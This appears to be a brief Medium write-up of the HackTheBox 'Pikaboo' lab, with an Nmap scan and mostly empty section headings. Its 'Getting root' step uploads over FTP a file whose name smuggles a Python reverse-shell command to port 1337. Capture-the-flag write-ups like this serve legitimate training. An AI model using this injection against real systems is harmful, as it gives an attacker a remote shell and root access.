HackTheBox — Pikaboo

Nmap Scan

Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-26 16:58 EET
Nmap scan report for
Host is up (0.12s latency).
Not shown: 997 closed ports
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 17:e1:13:fe:66:6d:26:b6:90:68:d0:30:54:2e:e2:9f (RSA)
| 256 92:86:54:f7:cc:5a:1a:15:fe:c6:09:cc:e5:7c:0d:c3 (ECDSA)
|_ 256 f4:cd:6f:3b:19:9c:cf:33:c6:6d:a5:13:6a:61:01:42 (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Pikaboo
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

HTTP Enumeration

Initial Foothold

Getting root

cd versions
put test "|python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("\"\",1337));[os.dup2(s.fileno(),f)for\ f\ in(0,1,2)];pty.spawn(""\"sh\")';.csv"



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


I am a Penetration Testing Enthusiast with computer science background, also interested in CTFs and python scripting.